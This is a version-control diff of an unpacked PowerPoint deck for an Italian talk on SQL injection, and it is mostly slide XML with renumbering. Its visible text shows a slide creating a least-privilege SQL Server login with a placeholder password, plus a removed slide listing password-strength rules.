+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B81C62-F688-1923-82CB-8633F6C98316}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>USE master;</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>CREATE LOGIN '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappuser</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' WITH PASSWORD 'YourStrong@Passw0rd’;</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>USE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappdb</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>CREATE USER '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappuser</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' FOR LOGIN '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappuser</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>';</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>ALTER ROLE [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>db_datareader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>] ADD MEMBER '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappuser</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>';</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>ALTER ROLE [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>db_datawriter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>] ADD MEMBER '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>myappuser</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>';</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241180902"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20090,7 +24416,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
@@ -20187,235 +24513,6 @@
               <a:t>https://github.com/CodicePlastico/BibeCatalogue</a:t>
             </a:r>
             <a:endParaRPr sz="1700" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2472833" y="1497613"/>
-            <a:ext cx="4198334" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Una buona password…</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="121" name="Google Shape;121;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2182797"/>
-            <a:ext cx="6887100" cy="2243867"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>8+ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>caratteri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Lettere minuscole e maiuscole</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Numeri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>Caratteri</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>speciali</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-            </a:br>
-            <a:endParaRPr sz="1600" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="FF0000"/>
-              </a:solidFill>
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
+++ b/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483674" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId44"/>
+    <p:notesMasterId r:id="rId48"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -31,67 +31,71 @@
     <p:sldId id="295" r:id="rId22"/>
     <p:sldId id="307" r:id="rId23"/>
     <p:sldId id="277" r:id="rId24"/>
-    <p:sldId id="280" r:id="rId25"/>
-    <p:sldId id="279" r:id="rId26"/>
-    <p:sldId id="281" r:id="rId27"/>
-    <p:sldId id="299" r:id="rId28"/>
-    <p:sldId id="282" r:id="rId29"/>
-    <p:sldId id="302" r:id="rId30"/>
-    <p:sldId id="303" r:id="rId31"/>
-    <p:sldId id="305" r:id="rId32"/>
-    <p:sldId id="306" r:id="rId33"/>
-    <p:sldId id="304" r:id="rId34"/>
-    <p:sldId id="273" r:id="rId35"/>
-    <p:sldId id="310" r:id="rId36"/>
-    <p:sldId id="311" r:id="rId37"/>
-    <p:sldId id="309" r:id="rId38"/>
-    <p:sldId id="285" r:id="rId39"/>
-    <p:sldId id="300" r:id="rId40"/>
-    <p:sldId id="308" r:id="rId41"/>
-    <p:sldId id="258" r:id="rId42"/>
-    <p:sldId id="264" r:id="rId43"/>
+    <p:sldId id="317" r:id="rId25"/>
+    <p:sldId id="280" r:id="rId26"/>
+    <p:sldId id="279" r:id="rId27"/>
+    <p:sldId id="281" r:id="rId28"/>
+    <p:sldId id="299" r:id="rId29"/>
+    <p:sldId id="282" r:id="rId30"/>
+    <p:sldId id="302" r:id="rId31"/>
+    <p:sldId id="303" r:id="rId32"/>
+    <p:sldId id="305" r:id="rId33"/>
+    <p:sldId id="306" r:id="rId34"/>
+    <p:sldId id="304" r:id="rId35"/>
+    <p:sldId id="316" r:id="rId36"/>
+    <p:sldId id="273" r:id="rId37"/>
+    <p:sldId id="310" r:id="rId38"/>
+    <p:sldId id="311" r:id="rId39"/>
+    <p:sldId id="309" r:id="rId40"/>
+    <p:sldId id="285" r:id="rId41"/>
+    <p:sldId id="300" r:id="rId42"/>
+    <p:sldId id="308" r:id="rId43"/>
+    <p:sldId id="318" r:id="rId44"/>
+    <p:sldId id="314" r:id="rId45"/>
+    <p:sldId id="264" r:id="rId46"/>
+    <p:sldId id="258" r:id="rId47"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
   <p:notesSz cx="6858000" cy="9144000"/>
   <p:embeddedFontLst>
     <p:embeddedFont>
       <p:font typeface="Anonymous Pro" panose="020B0604020202020204" charset="0"/>
-      <p:regular r:id="rId45"/>
-      <p:bold r:id="rId46"/>
-      <p:italic r:id="rId47"/>
-      <p:boldItalic r:id="rId48"/>
-    </p:embeddedFont>
-    <p:embeddedFont>
-      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId49"/>
       <p:bold r:id="rId50"/>
       <p:italic r:id="rId51"/>
       <p:boldItalic r:id="rId52"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId53"/>
       <p:bold r:id="rId54"/>
       <p:italic r:id="rId55"/>
       <p:boldItalic r:id="rId56"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId57"/>
       <p:bold r:id="rId58"/>
       <p:italic r:id="rId59"/>
       <p:boldItalic r:id="rId60"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId61"/>
       <p:bold r:id="rId62"/>
       <p:italic r:id="rId63"/>
       <p:boldItalic r:id="rId64"/>
     </p:embeddedFont>
     <p:embeddedFont>
+      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:regular r:id="rId65"/>
+      <p:bold r:id="rId66"/>
+      <p:italic r:id="rId67"/>
+      <p:boldItalic r:id="rId68"/>
+    </p:embeddedFont>
+    <p:embeddedFont>
       <p:font typeface="Comic Mono" pitchFamily="1" charset="0"/>
-      <p:regular r:id="rId65"/>
+      <p:regular r:id="rId69"/>
     </p:embeddedFont>
   </p:embeddedFontLst>
   <p:defaultTextStyle>
@@ -2800,6 +2804,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA1BA98-ED0D-1C25-705F-9F9C652F9F4A}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5AB67A-DC7C-7D91-22F5-A9D9F3401923}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9406AA59-C24F-8C07-5686-B3D9EFAA7ED2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="558434784"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C361CE7E-3A7D-5CD3-2AE4-A63D5D8A0B29}"/>
             </a:ext>
           </a:extLst>
@@ -2919,7 +3050,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3046,7 +3177,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3173,7 +3304,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3300,7 +3431,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3418,133 +3549,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690303856"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
